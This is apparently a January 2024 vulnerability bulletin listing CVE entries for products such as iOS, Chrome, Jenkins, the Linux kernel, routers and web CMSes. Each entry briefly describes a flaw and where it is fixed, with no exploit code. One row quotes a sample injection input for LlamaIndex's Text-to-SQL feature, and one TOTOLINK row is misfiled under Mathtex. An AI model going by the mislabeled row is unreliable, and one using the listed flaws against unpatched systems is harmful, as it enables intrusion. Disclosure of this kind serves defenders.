apple — ios_and_ipados | A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 16.7.5 and iPadOS 16.7.5, watchOS 10.2, macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 17.2 and iPadOS 17.2. An app may be able to access sensitive user data. | 2024-01-23 | not yet calculated | CVE-2023-42937 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ios_and_ipados | The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges. | 2024-01-23 | not yet calculated | CVE-2024-23208 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ios_and_ipados | This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to view a user’s phone number in system logs. | 2024-01-23 | not yet calculated | CVE-2024-23210 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ios_and_ipados | A privacy issue was addressed with improved handling of user preferences. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A user’s private browsing activity may be visible in Settings. | 2024-01-23 | not yet calculated | CVE-2024-23211 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ios_and_ipados | The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. Processing web content may lead to arbitrary code execution. | 2024-01-23 | not yet calculated | CVE-2024-23213 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ios_and_ipados | Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, iOS 17.3 and iPadOS 17.3. Processing maliciously crafted web content may lead to arbitrary code execution. | 2024-01-23 | not yet calculated | CVE-2024-23214 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ios_and_ipados | An issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access user-sensitive data. | 2024-01-23 | not yet calculated | CVE-2024-23215 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ios_and_ipados | A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. An app may be able to bypass certain Privacy preferences. | 2024-01-23 | not yet calculated | CVE-2024-23217 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ios_and_ipados | A timing side-channel issue was addressed with improvements to constant-time computation in cryptographic functions. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An attacker may be able to decrypt legacy RSA PKCS#1 v1.5 ciphertexts without having the private key. | 2024-01-23 | not yet calculated | CVE-2024-23218 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ios_and_ipados | The issue was addressed with improved authentication. This issue is fixed in iOS 17.3 and iPadOS 17.3. Stolen Device Protection may be unexpectedly disabled. | 2024-01-23 | not yet calculated | CVE-2024-23219 [email protected] [email protected] |
apple — macos | Multiple issues were addressed by updating to curl version 8.4.0. This issue is fixed in macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 16.7.5 and iPadOS 16.7.5. Multiple issues in curl. | 2024-01-23 | not yet calculated | CVE-2023-42915 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — macos | An authentication issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.6.4. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen. | 2024-01-23 | not yet calculated | CVE-2023-42935 [email protected] [email protected] [email protected] |
apple — macos | The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to execute arbitrary code with kernel privileges. | 2024-01-23 | not yet calculated | CVE-2024-23212 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — macos | A type confusion issue was addressed with improved checks. This issue is fixed in tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited. | 2024-01-23 | not yet calculated | CVE-2024-23222 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
appleple_inc. — a-blog_cms_ver.3.1.x_series | Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary code by uploading a specially crafted SVG file. | 2024-01-23 | not yet calculated | CVE-2024-23180 [email protected] [email protected] |
appleple_inc. — a-blog_cms_ver.3.1.x_series | Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote unauthenticated attacker to execute an arbitrary script on the logged-in user’s web browser. | 2024-01-23 | not yet calculated | CVE-2024-23181 [email protected] [email protected] |
appleple_inc. — a-blog_cms_ver.3.1.x_series | Relative path traversal vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to delete arbitrary files on the server. | 2024-01-23 | not yet calculated | CVE-2024-23182 [email protected] [email protected] |
appleple_inc. — a-blog_cms_ver.3.1.x_series | Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute an arbitrary script on the logged-in user’s web browser. | 2024-01-23 | not yet calculated | CVE-2024-23183 [email protected] [email protected] |
appleple_inc. — a-blog_cms_ver.3.1.x_series | Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary JavaScript code by uploading a specially crafted SVG file. | 2024-01-23 | not yet calculated | CVE-2024-23348 [email protected] [email protected] |
badaix — snapcast | An issue was discovered in badaix Snapcast version 0.27.0, allows remote attackers to execute arbitrary code and gain sensitive information via crafted request in JSON-RPC-API. | 2024-01-23 | not yet calculated | CVE-2023-36177 [email protected] [email protected] |
beetl-bbs — beetl-bbs | Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the /index keyword parameter. | 2024-01-23 | not yet calculated | CVE-2024-22490 [email protected] |
chasquid — chasquid | chasquid before 1.13 allows SMTP smuggling because LF-terminated lines are accepted. | 2024-01-22 | not yet calculated | CVE-2023-52354 [email protected] |
chigasaki_bakery — mini-app_line | An issue in CHIGASAKI BAKERY mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48131 [email protected] |
classLink — oneclick_extension | A Universal Cross Site Scripting (UXSS) vulnerability in ClassLink OneClick Extension through 10.8 allows remote attackers to inject JavaScript into any webpage. NOTE: this issue exists because of an incomplete fix for CVE-2022-48612. | 2024-01-23 | not yet calculated | CVE-2023-45889 [email protected] [email protected] |
clojure — clojure | In Clojure before 1.9.0, classes can be used to construct a serialized object that executes arbitrary code upon deserialization. This is relevant if a server deserializes untrusted objects. | 2024-01-22 | not yet calculated | CVE-2017-20189 [email protected] [email protected] [email protected] [email protected] [email protected] |
cloudlinux_os — cagefs | CloudLinux CageFS 7.1.1-1 or below passes the authentication token as command line argument. In some configurations this allows local users to view it via the process list and gain code execution as another user. | 2024-01-22 | not yet calculated | CVE-2020-36771 [email protected] [email protected] [email protected] |
cloudlinux_os — cagefs | CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths supplied to the sendmail proxy command. This allows local users to read and write arbitrary files outside the CageFS environment in a limited way. | 2024-01-22 | not yet calculated | CVE-2020-36772 [email protected] [email protected] [email protected] |
cohesity — dataprotect | Cohesity DataProtect prior to 6.8.1_u5 or 7.1 was discovered to have an incorrect access control vulnerability due to a lack of TLS Certificate Validation. | 2024-01-19 | not yet calculated | CVE-2023-33295 [email protected] [email protected] |
coign — crm_portal | An issue in Coign CRM Portal v.06.06 allows a remote attacker to escalate privileges via the userPermissionsList parameter in Session Storage component. | 2024-01-24 | not yet calculated | CVE-2023-43317 [email protected] |
contiki-ng — tinydtls | An issue was discovered in Contiki-NG tinyDTLS through 2018-08-30. One incorrect handshake could complete with different epoch numbers in the packets Client_Hello, Client_key_exchange, and Change_cipher_spec, which may cause denial of service. | 2024-01-22 | not yet calculated | CVE-2021-42141 [email protected] [email protected] [email protected] |
contiki-ng — tinydtls | An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. DTLS servers mishandle the early use of a large epoch number. This vulnerability allows remote attackers to cause a denial of service and false-positive packet drops. | 2024-01-23 | not yet calculated | CVE-2021-42142 [email protected] [email protected] |
contiki-ng — tinydtls | An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. An infinite loop bug exists during the handling of a ClientHello handshake message. This bug allows remote attackers to cause a denial of service by sending a malformed ClientHello handshake message with an odd length of cipher suites, which triggers an infinite loop (consuming all resources) and a buffer over-read that can disclose sensitive information. | 2024-01-24 | not yet calculated | CVE-2021-42143 [email protected] |
contiki-ng — tinydtls | Buffer over-read vulnerability in Contiki-NG tinyDTLS through master branch 53a0d97 allows attackers obtain sensitive information via crafted input to dtls_ccm_decrypt_message(). | 2024-01-24 | not yet calculated | CVE-2021-42144 [email protected] |
contiki-ng — tinydtls | An assertion failure discovered in in check_certificate_request() in Contiki-NG tinyDTLS through master branch 53a0d97 allows attackers to cause a denial of service. | 2024-01-24 | not yet calculated | CVE-2021-42145 [email protected] |
contiki-ng — tinydtls | An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. DTLS servers allow remote attackers to reuse the same epoch number within two times the TCP maximum segment lifetime, which is prohibited in RFC6347. This vulnerability allows remote attackers to obtain sensitive application (data of connected clients). | 2024-01-24 | not yet calculated | CVE-2021-42146 [email protected] |
contiki-ng — tinydtls | Buffer over-read vulnerability in the dtls_sha256_update function in Contiki-NG tinyDTLS through master branch 53a0d97 allows remote attackers to cause a denial of service via crafted data packet. | 2024-01-24 | not yet calculated | CVE-2021-42147 [email protected] |
d-link — dir-815 | There is a command injection vulnerability in the ssdpcgi_main function of cgibin binary in D-Link DIR-815 router firmware v1.04. | 2024-01-24 | not yet calculated | CVE-2024-22651 [email protected] |
d-link — dir-882 | D-Link DIR-882 DIR882A1_FW130B06 was discovered to contain a stack overflow via the sub_477AA0 function. | 2024-01-24 | not yet calculated | CVE-2024-22751 [email protected] [email protected] |
elecom_co._ltd. — wrc-x1800gs-b | OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product. Affected products and versions are as follows: WRC-X1800GS-B v1.17 and earlier, WRC-X1800GSA-B v1.17 and earlier, WRC-X1800GSH-B v1.17 and earlier, WRC-X6000XS-G v1.09, and WRC-X6000XST-G v1.12 and earlier. | 2024-01-24 | not yet calculated | CVE-2024-22372 [email protected] [email protected] |
ezserver — ezserver | EzServer 6.4.017 allows a denial of service (daemon crash) via a long string, such as one for the RNTO command. | 2024-01-25 | not yet calculated | CVE-2024-23985 [email protected] |
ffmpeg — ffmpeg | Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the jpegxl_anim_read_packet component in the JPEG XL Animation decoder. | 2024-01-27 | not yet calculated | CVE-2024-22860 [email protected] [email protected] |
ffmpeg — ffmpeg | Integer overflow vulnerability in FFmpeg before n6.1, allows attackers to cause a denial of service (DoS) via the avcodec/osq module. | 2024-01-27 | not yet calculated | CVE-2024-22861 [email protected] |
ffmpeg — ffmpeg | Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the JJPEG XL Parser. | 2024-01-27 | not yet calculated | CVE-2024-22862 [email protected] [email protected] |
form_tools — form_tools | Form Tools v3.1.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /form_builder/preview.php?form_id=2. | 2024-01-25 | not yet calculated | CVE-2024-22637 [email protected] |
ghost — ghost | Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries. | 2024-01-21 | not yet calculated | CVE-2024-23725 [email protected] [email protected] |
ginza_cafe — mini-app _line | An issue in GINZA CAFE mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48130 [email protected] |
gnome — gdxpixbuf | In GNOME GdkPixbuf (aka gdk-pixbuf) through 2.42.10, the ANI (Windows animated cursor) decoder encounters heap memory corruption (in ani_load_chunk in io-ani.c) when parsing chunks in a crafted .ani file. A crafted file could allow an attacker to overwrite heap metadata, leading to a denial of service or code execution attack. This occurs in gdk_pixbuf_set_option() in gdk-pixbuf.c. | 2024-01-26 | not yet calculated | CVE-2022-48622 [email protected] |
google — chrome | Insufficient policy enforcement in iOS Security UI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2024-01-24 | not yet calculated | CVE-2024-0804 [email protected] [email protected] [email protected] [email protected] |
google — chrome | Inappropriate implementation in Downloads in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium) | 2024-01-24 | not yet calculated | CVE-2024-0805 [email protected] [email protected] [email protected] [email protected] |
google — chrome | Use after free in Passwords in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium) | 2024-01-24 | not yet calculated | CVE-2024-0806 [email protected] [email protected] [email protected] [email protected] |
google — chrome | Use after free in Web Audio in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2024-01-24 | not yet calculated | CVE-2024-0807 [email protected] [email protected] [email protected] [email protected] |
google — chrome | Integer underflow in WebUI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High) | 2024-01-24 | not yet calculated | CVE-2024-0808 [email protected] [email protected] [email protected] [email protected] |
google — chrome | Inappropriate implementation in Autofill in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low) | 2024-01-24 | not yet calculated | CVE-2024-0809 [email protected] [email protected] [email protected] [email protected] |
google — chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium) | 2024-01-24 | not yet calculated | CVE-2024-0810 [email protected] [email protected] [email protected] [email protected] |
google — chrome | Inappropriate implementation in Extensions API in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Low) | 2024-01-24 | not yet calculated | CVE-2024-0811 [email protected] [email protected] [email protected] [email protected] |
google — chrome | Inappropriate implementation in Accessibility in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High) | 2024-01-24 | not yet calculated | CVE-2024-0812 [email protected] [email protected] [email protected] [email protected] |
google — chrome | Use after free in Reading Mode in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium) | 2024-01-24 | not yet calculated | CVE-2024-0813 [email protected] [email protected] [email protected] [email protected] |
google — chrome | Incorrect security UI in Payments in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially spoof security UI via a crafted HTML page. (Chromium security severity: Medium) | 2024-01-24 | not yet calculated | CVE-2024-0814 [email protected] [email protected] [email protected] [email protected] |
gpac — gpac | GPAC v2.3 was detected to contain a buffer overflow via the function gf_isom_new_generic_sample_description function in the isomedia/isom_write.c:4577 | 2024-01-25 | not yet calculated | CVE-2024-22749 [email protected] [email protected] |
igalerie — igalerie | iGalerie v3.0.22 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Titre (Title) field in the editing interface. | 2024-01-25 | not yet calculated | CVE-2024-22639 [email protected] |
ivanti — avalanche | Directory Traversal vulnerability in Ivanti Avalanche 6.3.4.153 allows a remote authenticated attacker to obtain sensitive information via the javax.faces.resource component. | 2024-01-25 | not yet calculated | CVE-2023-41474 [email protected] |
jenkins — jenkins | Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an ‘@’ character followed by a file path in an argument with the file’s contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system. | 2024-01-24 | not yet calculated | CVE-2024-23897 [email protected] |
jenkins — jenkins | Jenkins 2.217 through 2.441 (both inclusive), LTS 2.222.1 through 2.426.2 (both inclusive) does not perform origin validation of requests made through the CLI WebSocket endpoint, resulting in a cross-site WebSocket hijacking (CSWSH) vulnerability, allowing attackers to execute CLI commands on the Jenkins controller. | 2024-01-24 | not yet calculated | CVE-2024-23898 [email protected] |
jenkins — jenkins | Jenkins Git server Plugin 99.va_0826a_b_cdfa_d and earlier does not disable a feature of its command parser that replaces an ‘@’ character followed by a file path in an argument with the file’s contents, allowing attackers with Overall/Read permission to read content from arbitrary files on the Jenkins controller file system. | 2024-01-24 | not yet calculated | CVE-2024-23899 [email protected] [email protected] |
jenkins — jenkins | Jenkins Matrix Project Plugin 822.v01b_8c85d16d2 and earlier does not sanitize user-defined axis names of multi-configuration projects, allowing attackers with Item/Configure permission to create or replace any config.xml files on the Jenkins controller file system with content not controllable by the attackers. | 2024-01-24 | not yet calculated | CVE-2024-23900 [email protected] [email protected] |
jenkins — jenkins | Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier unconditionally discovers projects that are shared with the configured owner group, allowing attackers to configure and share a project, resulting in a crafted Pipeline being built by Jenkins during the next scan of the group. | 2024-01-24 | not yet calculated | CVE-2024-23901 [email protected] [email protected] |
jenkins — jenkins | A cross-site request forgery (CSRF) vulnerability in Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier allows attackers to connect to an attacker-specified URL. | 2024-01-24 | not yet calculated | CVE-2024-23902 [email protected] [email protected] |
jenkins — jenkins | Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token. | 2024-01-24 | not yet calculated | CVE-2024-23903 [email protected] [email protected] |
jenkins — jenkins | Jenkins Log Command Plugin 1.0.2 and earlier does not disable a feature of its command parser that replaces an ‘@’ character followed by a file path in an argument with the file’s contents, allowing unauthenticated attackers to read content from arbitrary files on the Jenkins controller file system. | 2024-01-24 | not yet calculated | CVE-2024-23904 [email protected] [email protected] |
jenkins — jenkins | Jenkins Red Hat Dependency Analytics Plugin 0.7.1 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download. | 2024-01-24 | not yet calculated | CVE-2024-23905 [email protected] [email protected] |
jensen_of_scandinavia — eagle_1200 | Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a command injection vulnerability in the function formWriteFacMac. This vulnerability allows attackers to execute arbitrary commands via manipulation of the mac parameter. | 2024-01-22 | not yet calculated | CVE-2023-24135 [email protected] [email protected] [email protected] [email protected] |
jfinalcms — jfinalcms | Cross Site Scripting (XSS) vulnerability in JFinalcms 5.0.0 allows attackers to run arbitrary code via the /admin/login username parameter. | 2024-01-23 | not yet calculated | CVE-2024-22496 [email protected] |
jfinalcms — jfinalcms | Cross Site Scripting (XSS) vulnerability in /admin/login password parameter in JFinalcms 5.0.0 allows attackers to run arbitrary code via crafted URL. | 2024-01-23 | not yet calculated | CVE-2024-22497 [email protected] |
kanboard — kanboard | Kanboard 1.2.34 is vulnerable to Html Injection in the group management feature. | 2024-01-24 | not yet calculated | CVE-2024-22720 [email protected] |
kimono-oldnew — mini-app_line | An issue in kimono-oldnew mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48129 [email protected] |
kosei entertainment — esportsstudiolegends_mini-app_line | An issue in kosei entertainment esportsstudioLegends mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48132 [email protected] |
leptoncms — leptoncms | An arbitrary file upload vulnerability in LeptonCMS v7.0.0 allows authenticated attackers to execute arbitrary code via uploading a crafted PHP file. | 2024-01-25 | not yet calculated | CVE-2024-24399 [email protected] |
linux — kernel | In the Linux kernel before 6.5.9, there is a NULL pointer dereference in send_acknowledge in net/nfc/nci/spi.c. | 2024-01-23 | not yet calculated | CVE-2023-46343 [email protected] [email protected] [email protected] [email protected] |
linux — kernel | In the Linux kernel before 6.4.12, amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c has a fence use-after-free. | 2024-01-23 | not yet calculated | CVE-2023-51042 [email protected] [email protected] |
linux — kernel | In the Linux kernel before 6.4.5, drivers/gpu/drm/drm_atomic.c has a use-after-free during a race condition between a nonblocking atomic commit and a driver unload. | 2024-01-23 | not yet calculated | CVE-2023-51043 [email protected] [email protected] |
linux — kernel | An issue was discovered in ksmbd in the Linux kernel before 6.6.10. smb2_get_data_area_len in fs/smb/server/smb2misc.c can cause an smb_strndup_from_utf16 out-of-bounds access because the relationship between Name data and CreateContexts data is mishandled. | 2024-01-23 | not yet calculated | CVE-2024-22705 [email protected] [email protected] |
linux — kernel | In the Linux kernel through 6.7.1, there is a use-after-free in cec_queue_msg_fh, related to drivers/media/cec/core/cec-adap.c and drivers/media/cec/core/cec-api.c. | 2024-01-23 | not yet calculated | CVE-2024-23848 [email protected] |
linux — kernel | In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access. | 2024-01-23 | not yet calculated | CVE-2024-23849 [email protected] [email protected] |
linux — kernel | In btrfs_get_root_ref in fs/btrfs/disk-io.c in the Linux kernel through 6.7.1, there can be an assertion failure and crash because a subvolume can be read out too soon after its root item is inserted upon subvolume creation. | 2024-01-23 | not yet calculated | CVE-2024-23850 [email protected] [email protected] |
linux — kernel | copy_params in drivers/md/dm-ioctl.c in the Linux kernel through 6.7.1 can attempt to allocate more than INT_MAX bytes, and crash, because of a missing param_kernel->data_size check. This is related to ctl_ioctl. | 2024-01-23 | not yet calculated | CVE-2024-23851 [email protected] [email protected] |
livesite — livesite | liveSite v2019.1 was discovered to contain a remote code execution (RCE) vulnerability via the component /livesite/edit_designer_region.php. | 2024-01-25 | not yet calculated | CVE-2024-22638 [email protected] |
llamaHub — llamahub | The OpenAPI and ChatGPT plugin loaders in LlamaHub (aka llama-hub) before 0.0.67 allow attackers to execute arbitrary code because safe_load is not used for YAML. | 2024-01-21 | not yet calculated | CVE-2024-23730 [email protected] [email protected] [email protected] |
llamaindex — llamaindex | LlamaIndex (aka llama_index) through 0.9.34 allows SQL injection via the Text-to-SQL feature in NLSQLTableQueryEngine, SQLTableRetrieverQueryEngine, NLSQLRetriever, RetrieverQueryEngine, and PGVectorSQLQueryEngine. For example, an attacker might be able to delete this year’s student records via “Drop the Students table” within English language input. | 2024-01-22 | not yet calculated | CVE-2024-23751 [email protected] |
luxe_beauty_clinic — mini-app_line | An issue in Luxe Beauty Clinic mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48126 [email protected] |
mathtex — mathtex | Buffer Overflow vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via the length of the LaTeX string component. | 2024-01-24 | not yet calculated | CVE-2023-51885 [email protected] |
mathtex — mathtex | Buffer Overflow vulnerability in the main() function in Mathtex 1.05 and before allows a remote attacker to cause a denial of service when using \convertpath. | 2024-01-24 | not yet calculated | CVE-2023-51886 [email protected] |
mathtex — mathtex | Command Injection vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in application URL. | 2024-01-24 | not yet calculated | CVE-2023-51887 [email protected] |
mathtex — mathtex | Buffer Overflow vulnerability in the nomath() function in Mathtex v.1.05 and before allows a remote attacker to cause a denial of service via a crafted string in the application URL. | 2024-01-24 | not yet calculated | CVE-2023-51888 [email protected] |
mathtex — mathtex | Stack Overflow vulnerability in the validate() function in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in the application URL. | 2024-01-24 | not yet calculated | CVE-2023-51889 [email protected] |
mathtex — mathtex | An infinite loop issue discovered in Mathtex 1.05 and before allows a remote attacker to consume CPU resources via crafted string in the application URL. | 2024-01-24 | not yet calculated | CVE-2023-51890 [email protected] |
mathtex — mathtex | An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allow attackers to run arbitrary commands via the sub_415C80 function. | 2024-01-24 | not yet calculated | CVE-2023-52038 [email protected] |
mbed — tls | An issue was discovered in Mbed TLS through 3.5.1. In mbedtls_ssl_session_reset, the maximum negotiable TLS version is mishandled. For example, if the last connection negotiated TLS 1.2, then 1.2 becomes the new maximum. | 2024-01-21 | not yet calculated | CVE-2023-52353 [email protected] |
mbed — tls | An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions. | 2024-01-21 | not yet calculated | CVE-2024-23744 [email protected] |
mercari,_inc. — “mercari”_app_for_android | Improper authorization in handler for custom URL scheme issue in “Mercari” App for Android prior to version 5.78.0 allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack. | 2024-01-26 | not yet calculated | CVE-2024-23388 [email protected] |
meross — msh30q | Meross MSH30Q 4.5.23 is vulnerable to Cleartext Transmission of Sensitive Information. During the device setup phase, the MSH30Q creates an unprotected Wi-Fi access point. In this phase, MSH30Q needs to connect to the Internet through a Wi-Fi router. This is why MSH30Q asks for the Wi-Fi network name (SSID) and the Wi-Fi network password. When the user enters the password, the transmission of the Wi-Fi password and name between the MSH30Q and mobile application is observed in the Wi-Fi network. Although the Wi-Fi password is encrypted, a part of the decryption algorithm is public so we complemented the missing parts to decrypt it. | 2024-01-23 | not yet calculated | CVE-2023-46889 [email protected] |
meross — msh30q | The radio frequency communication protocol being used by Meross MSH30Q 4.5.23 is vulnerable to replay attacks, allowing attackers to record and replay previously captured communication to execute unauthorized commands or actions (e.g., thermostat’s temperature). | 2024-01-23 | not yet calculated | CVE-2023-46892 [email protected] |
metagpt — metagpt | MetaGPT through 0.6.4 allows the QaEngineer role to execute arbitrary code because RunCode.run_script() passes shell metacharacters to subprocess.Popen. | 2024-01-22 | not yet calculated | CVE-2024-23750 [email protected] |
mimasaka_farm — mini-app_line | An issue in mimasaka_farm mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48135 [email protected] |
ministry_of_agriculture_forestry_and_fisheries — electronic_delivery_check_system_ministry_of_agriculture_forestry_and_fisheries_the_agriculture_and_rural_development_project_version_march_heisei_31_era_edition | Electronic Delivery Check System (Ministry of Agriculture, Forestry and Fisheries The Agriculture and Rural Development Project Version) March, Heisei 31 era edition Ver.14.0.001.002 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. | 2024-01-24 | not yet calculated | CVE-2024-22380 [email protected] [email protected] |
ministry_of_defense — electronic_deliverables_creation_support_tool_(construction_edition) | Electronic Deliverables Creation Support Tool (Construction Edition) prior to Ver1.0.4 and Electronic Deliverables Creation Support Tool (Design & Survey Edition) prior to Ver1.0.4 improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. | 2024-01-24 | not yet calculated | CVE-2024-21796 [email protected] [email protected] |
